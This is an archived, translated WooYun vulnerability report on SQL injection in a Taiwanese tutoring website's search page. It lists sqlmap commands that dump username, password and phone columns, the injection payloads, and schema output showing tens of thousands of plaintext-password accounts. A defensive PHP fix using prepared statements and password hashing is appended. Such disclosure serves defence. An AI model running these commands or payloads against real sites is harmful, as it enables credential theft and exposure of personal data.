
Vulnerability summary

Defect ID: wooyun-2015-0156541

Title: SQL injection vulnerability in Tutor Bank (家教銀行), operated by 創意王數位科技有限公司 (plaintext passwords and personal information of over 40,000 teachers and over 30,000 users exposed) (Taiwan region)

Related vendor: 創意王數位科技

Author: 路人甲

Submitted: 2015-11-30 09:20

Fixed: 2016-01-16 01:42

Published: 2016-01-16 01:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (HITCON Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-11-30: Details sent to the vendor; awaiting the vendor's handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in the relevant field
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-16: Details disclosed to the public

Brief description:

SQL injection vulnerability in Tutor Bank (家教銀行), operated by 創意王數位科技有限公司 (plaintext passwords and personal information of over 40,000 teachers and over 30,000 users exposed)

Detailed description:

URL: http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2

$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch  -D tutorbankcomtw -T teacher -C t_user,t_passwd,t_name1,t_name2,t_phone --dump --start 1 --stop 20


$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch  -D tutorbankcomtw -T member -C m_user,m_passwd,m_mobile,m_login,m_email --dump --start 1 --stop 20


Database: tutorbankcomtw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| teacher | 42398 |
| member | 32900 |


Database: tutorbankcomtw
Table: teacher
[20 entries]


Database: tutorbankcomtw
Table: member
[20 entries]

Proof of vulnerability:

---
Parameter: s1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'tutorbankcomtw@%'
current user is DBA: False
database management system users [1]:
[*] 'tutorbankcomtw'@'%'
Database: tutorbankcomtw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| teacher | 42398 |
| member | 32900 |
| t_logintime | 28380 |
| member_app | 13131 |
| m_logintime | 12955 |
| teacher_favor | 12588 |
| teacher_app | 9493 |
| case_favor | 5756 |
| newcase | 5538 |
| smilepay | 1788 |
| iepay_1 | 862 |
| iepay_2 | 195 |
| index1ad | 5 |
| indexad | 5 |
| teacherad | 4 |
| memberad | 3 |
| casead | 2 |
| upad | 2 |
| index2ad | 1 |
| index3ad | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 768 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| PARTITIONS | 60 |
| TABLES | 60 |
| CHARACTER_SETS | 39 |
| PLUGINS | 23 |
| KEY_COLUMN_USAGE | 19 |
| STATISTICS | 19 |
| TABLE_CONSTRAINTS | 19 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| PROCESSLIST | 2 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: tutorbankcomtw
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| m_passwd | varchar(16) |
+----------+-------------+
Database: tutorbankcomtw
Table: teacher
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| t_passwd | varchar(16) |
+----------+-------------+


web application technology: Apache
back-end DBMS: MySQL 5.0
Database: tutorbankcomtw
Table: teacher
[83 columns]
+--------------+---------------------+
| Column | Type |
+--------------+---------------------+
| area1 | tinyint(1) |
| area2 | tinyint(1) |
| area3 | tinyint(1) |
| area4 | tinyint(1) |
| area5 | tinyint(1) |
| area6 | tinyint(1) |
| authcode | varchar(8) |
| city | varchar(9) |
| city1 | varchar(15) |
| city2 | varchar(15) |
| city3 | varchar(15) |
| city4 | varchar(15) |
| city5 | varchar(15) |
| city6 | varchar(15) |
| class1 | varchar(240) |
| class10 | varchar(240) |
| class11 | varchar(240) |
| class12 | varchar(240) |
| class13 | varchar(240) |
| class2 | varchar(240) |
| class3 | varchar(240) |
| class4 | varchar(240) |
| class5 | varchar(240) |
| class6 | varchar(240) |
| class7 | varchar(240) |
| class8 | varchar(240) |
| class9 | varchar(240) |
| conton | varchar(9) |
| picpath | varchar(30) |
| state | tinyint(1) |
| t_contact1 | varchar(4) |
| t_contact2 | varchar(4) |
| t_content | text |
| t_count | int(7) |
| t_del | tinyint(1) |
| t_email | varchar(40) |
| t_exp | tinyint(1) |
| t_fore | tinyint(1) |
| t_fri | varchar(24) |
| t_gentle | varchar(6) |
| t_grader | varchar(66) |
| t_id | int(7) unsigned |
| t_ip | varchar(20) |
| t_job | varchar(12) |
| t_joindate | datetime |
| t_level | tinyint(1) |
| t_leveltime | datetime |
| t_leveltime2 | datetime |
| t_licence | text |
| t_login | datetime |
| t_mobile | varchar(12) |
| t_mon | varchar(24) |
| t_month | tinyint(1) |
| t_name1 | varchar(10) |
| t_name2 | varchar(10) |
| t_open1 | tinyint(1) |
| t_open2 | tinyint(1) |
| t_open3 | tinyint(1) |
| t_passwd | varchar(16) |
| t_phone | varchar(20) |
| t_poll | tinyint(1) |
| t_push | tinyint(1) |
| t_pushtime | datetime |
| t_recivie | tinyint(1) |
| t_salary1 | int(4) |
| t_salary2 | int(4) |
| t_sat | varchar(24) |
| t_sch1 | varchar(90) |
| t_sch2 | varchar(42) |
| t_sch3 | varchar(9) |
| t_sex | varchar(6) |
| t_sid | varchar(11) |
| t_status | tinyint(1) |
| t_sun | varchar(24) |
| t_teach | varchar(39) |
| t_thu | varchar(24) |
| t_try | varchar(9) |
| t_tue | varchar(24) |
| t_update | datetime |
| t_user | varchar(16) |
| t_vip | tinyint(1) |
| t_wed | varchar(24) |
| t_year | tinyint(1) unsigned |
+--------------+---------------------+
Database: tutorbankcomtw
Table: member
[31 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| city | varchar(9) |
| conton | varchar(9) |
| m_address | varchar(100) |
| m_cert | varchar(10) |
| m_class | tinyint(1) |
| m_contact1 | varchar(4) |
| m_contact2 | varchar(4) |
| m_count | int(7) |
| m_del | tinyint(1) |
| m_email | varchar(40) |
| m_fax | varchar(20) |
| m_id | int(7) |
| m_ins | text |
| m_inter | tinyint(1) |
| m_ip | varchar(20) |
| m_joindate | datetime |
| m_level | tinyint(1) |
| m_leveltime | datetime |
| m_login | datetime |
| m_mobile | varchar(12) |
| m_name | varchar(42) |
| m_open1 | tinyint(1) |
| m_open2 | tinyint(1) |
| m_open3 | tinyint(1) |
| m_open4 | tinyint(1) |
| m_passwd | varchar(16) |
| m_phone | varchar(20) |
| m_poll | tinyint(1) |
| m_recivie | tinyint(1) |
| m_update | datetime |
| m_user | varchar(16) |
+-------------+--------------+

Fix recommendation:

Add input filtering.
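An added example of what that fix looks like in practice; this is not Tutor Bank's code. It assumes the search handler (tsearch_language.php) runs on PHP with MySQL, as the page's file extension and sqlmap fingerprint indicate, and that the original interpolated the s1 search term into a quoted, parenthesised WHERE expression, which is what a payload that has to close `')` tells you. The column names are taken from the teacher column listing above; the mapping of s1 to t_teach and the database account name are assumptions.

```php
<?php
// Vulnerable pattern (assumed shape of the original, do not use):
//   $sql = "SELECT ... FROM teacher WHERE (t_teach LIKE '%" . $_GET['s1'] . "%')";
// Filtering characters out of the string before concatenation is fragile;
// binding parameters keeps data and SQL apart whatever quotes, comment
// markers or NUL bytes the value contains.

$pdo = new PDO(
    'mysql:host=localhost;dbname=tutorbankcomtw;charset=utf8mb4',
    'tutorbankcomtw_app',            // hypothetical least-privilege account
    getenv('DB_PASSWORD'),
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
    ]
);

function searchTeachers(PDO $pdo, array $get): array
{
    $filters = [];
    $params  = [];
    // s1..s8 are free-text search terms from the form; which column each one
    // targets is fixed in code, never taken from the request.
    foreach (['s1' => 't_teach', 's4' => 't_sch1', 's6' => 't_grader'] as $name => $column) {
        $value = trim((string)($get[$name] ?? ''));
        if ($value === '') {
            continue;
        }
        // Escape LIKE wildcards so a user cannot turn "%" into "match everything".
        $value = addcslashes($value, '%_\\');
        $filters[]        = "$column LIKE :$name";
        $params[":$name"] = '%' . $value . '%';
    }
    $sql = 'SELECT t_id, t_name1, t_name2, t_teach FROM teacher WHERE t_del = 0';
    if ($filters) {
        $sql .= ' AND (' . implode(' OR ', $filters) . ')';
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);    // values travel as data, never as SQL text
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The dump also shows t_passwd / m_passwd stored as plaintext varchar(16).
// Store a salted hash instead (widen the column to varchar(255)) and check
// logins with password_verify() rather than comparing the column directly.
function storeTeacherPassword(PDO $pdo, int $teacherId, string $plain): void
{
    $stmt = $pdo->prepare('UPDATE teacher SET t_passwd = :h WHERE t_id = :id');
    $stmt->execute([':h' => password_hash($plain, PASSWORD_DEFAULT), ':id' => $teacherId]);
}
```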

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-12-02 01:41

Vendor reply:

Thank you for the report.

Latest status:

None yet